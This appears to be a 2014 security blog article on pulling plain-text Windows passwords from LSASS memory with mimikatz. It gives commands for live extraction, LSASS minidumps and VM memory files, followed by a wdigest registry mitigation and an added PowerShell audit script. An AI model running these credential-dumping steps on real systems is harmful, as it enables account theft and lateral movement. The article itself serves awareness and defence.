Posted on June 18, 2014 · Posted in Windows Server 2008 R2

How to Get Plain Text Passwords of Windows Users

In this article, part of a series on Windows system security (the previous article covered the security problems of passwords stored in Group Policy Preferences), we look at a fairly simple method of obtaining the unencrypted passwords of all users logged on to a Windows system.

Disclaimer. The information and technologies described in this article are provided for reference only and must not be used to gain access to the accounts, information or systems of third parties.

Most system administrators are sure that Windows does not store plain-text user passwords, only their hashes. Although many tools today can extract password hashes from a system, it is fair to say that a sufficiently complex, non-dictionary password makes it almost impossible for an attacker to recover it by brute force or from a table of precomputed hashes.

This is true, but there are nuances concerning the users currently logged on to the system. Some system processes keep the actual passwords (in encrypted form), not their hashes, for their own purposes.

For instance, HTTP Digest Authentication, which is used to support SSO (Single Sign-On), needs the user's password along with its hash. Encrypted user passwords (the passwords themselves, not their hashes) are kept in OS memory, specifically inside the LSASS.EXE process. The problem is that this encryption is implemented with the standard Win32 functions LsaProtectMemory and LsaUnprotectMemory, which encrypt and decrypt a region of memory. mimikatz, a tool by French developers, reads the encrypted data from memory, decrypts it with LsaUnprotectMemory and displays all accounts of users logged on to the system together with their passwords (decrypted, in plain text!).

You can download mimikatz here:

Info. Mimikatz is detected by the majority of antivirus products as potentially unwanted software (a hacker tool).

Mimikatz can extract user passwords either directly from memory or from a memory dump of the PC.

How to Extract User Passwords from lsass.exe Online

  • Download and run Mimikatz.exe (there are x86 and x64 versions for the corresponding systems)
  • Run the following commands in the tool
mimikatz # privilege::debug
mimikatz # sekurlsa::logonPasswords full

(the last command displays all accounts and passwords of the users who have sessions on this system).

As you can see, the tool has shown us the password of the user named user.

Note. This method won't work if a modern antivirus blocks the injection. In that case you will have to create a memory dump of this machine and extract the passwords for all user sessions on another PC.

How to Get a User Password from Windows Memory Dump

A memory dump of the LSASS process can be obtained with the Out-Minidump.ps1 function in PowerShell. Import the Out-Minidump function into PowerShell and create a memory dump of the LSASS process:

Get-Process lsass | Out-Minidump


The memory dump (in our example, lsass_562.dmp; by default it is saved in the %windir%\system32 directory) has to be copied to another system with mimikatz, where the following command is run:

mimikatz "sekurlsa::minidump lsass_592.dmp"

The next command lists the users who were logged on to the system and their plain-text passwords:

mimikatz # sekurlsa::logonPasswords

As you can see, it’s easy.

How to Get Passwords from Virtual Machine and Hibernation Files

Let's move on. With a few simple steps, an attacker can extract user passwords from memory dump files, system hibernation files and virtual machine .vmem files (virtual machine page files and their snapshots).

To do it, you need the Debugging Tools for Windows (WinDbg) package, mimikatz itself and a utility to convert a .vmem file into a memory dump (for Hyper-V this can be vm2dmp.exe; for VMware vmem files, the MoonSols Windows Memory Toolkit).

For example, to convert the vmem page file of a VMware virtual machine into a dump, run this command:

bin2dmp.exe "wsrv2008r2-1.vmem" vmware.dmp

Open the dump in WinDbg (File -> Open Crash Dump) and load the mimikatz library mimilib.dll (choose the version matching the bitness of the system):

.load mimilib.dll

Find the lsass.exe process in the dump:

!process 0 0 lsass.exe


And finally, type

.process /r /p fffffa800e0b3b30

and get a list of Windows users and their passwords in plain text.

It is possible to obtain unencrypted passwords of Windows users with mimikatz on the following systems, including those running under different versions of Hyper-V 2008/2012 and VMware hypervisors:

  • Windows Server 2008 / 2008 R2
  • Windows Server 2012 / 2012 R2
  • Windows 7
  • Windows 8

Note. The mimikatz features have also been integrated into the Metasploit Framework.

Can I Protect Myself From Acquiring My Password Via mimikatz?

As a temporary solution, you can disable the wdigest security provider in the registry. To do it, open the Security Packages value under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa and delete the wdigest entry from the list of packages.


However, keep in mind that an attacker with the corresponding rights to the registry can easily change the setting back.
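The registry change above can be audited and applied from PowerShell, which also makes it easy to re-check on a schedule whether the wdigest entry has been restored. The script below is an added example and is not part of the original article or of mimikatz; it assumes that Security Packages is a REG_MULTI_SZ value under HKLM\SYSTEM\CurrentControlSet\Control\Lsa as the article describes, that it runs in an elevated session, and that LSA only picks up the change after a reboot. The function and variable names are the author's own choices.

```powershell
# Added example (not from the original article): audit and optionally remove the
# wdigest entry from the LSA "Security Packages" list described above.
# Assumptions: the value is a REG_MULTI_SZ under the Lsa key, the session is elevated,
# and a reboot is needed before LSA stops loading the package.

$LsaKey        = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$ValueName     = 'Security Packages'
$PackageToDrop = 'wdigest'

function Get-LsaSecurityPackages {
    # Returns the current package list as an array of strings (empty if the value is absent).
    $item = Get-ItemProperty -Path $LsaKey -Name $ValueName -ErrorAction SilentlyContinue
    if ($null -eq $item) { return @() }
    return @($item.$ValueName | Where-Object { $_ -ne '' })
}

function Test-WDigestEnabled {
    # $true when wdigest is still listed, i.e. the provider that keeps reversible
    # passwords in LSASS memory is loaded at boot. Suitable for a scheduled re-check,
    # since an attacker with registry rights can put the entry back.
    $packages = Get-LsaSecurityPackages
    return [bool]($packages | Where-Object { $_ -ieq $PackageToDrop })
}

function Remove-WDigestPackage {
    [CmdletBinding(SupportsShouldProcess = $true)]
    param()
    $packages = Get-LsaSecurityPackages
    if (-not ($packages | Where-Object { $_ -ieq $PackageToDrop })) {
        Write-Host "'$PackageToDrop' is not listed in '$ValueName'; nothing to do."
        return
    }
    # Keep every other package exactly as it was; only wdigest is dropped.
    [string[]]$remaining = @($packages | Where-Object { $_ -ine $PackageToDrop })
    if ($PSCmdlet.ShouldProcess("$LsaKey\$ValueName", "remove '$PackageToDrop'")) {
        Set-ItemProperty -Path $LsaKey -Name $ValueName -Value $remaining -Type MultiString
        Write-Host "Removed '$PackageToDrop'. Remaining packages: $($remaining -join ', '). Reboot required."
    }
}

# Audit run: report the current state; -WhatIf only previews the change.
if (Test-WDigestEnabled) {
    Write-Warning "wdigest is listed in '$ValueName': plain-text passwords of logged-on users are reachable in LSASS memory."
    Remove-WDigestPackage -WhatIf   # drop -WhatIf to apply the change
} else {
    Write-Host "wdigest is not listed in '$ValueName'."
}
```

Running the script with -WhatIf in place shows what would be removed without touching the registry; removing it applies the change, and the machine has to be rebooted before the provider is actually unloaded. Because Test-WDigestEnabled returns a plain boolean, it can be run from a scheduled task or a configuration-management check to catch the reversal the paragraph above warns about.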

Conclusions. Let's recall the security essentials once again:

  • Don't use the same passwords for different services (especially terminal services that belong to third parties).
  • Consider the security of your passwords and data on virtual machines in widely advertised clouds, since you don't know who else has access to the hypervisors and storage on which the virtual machines are located.
  • Minimize the number of accounts on your systems that have local administrator privileges.
  • Never log on to servers and PCs that are accessible to other users with a domain administrator account.
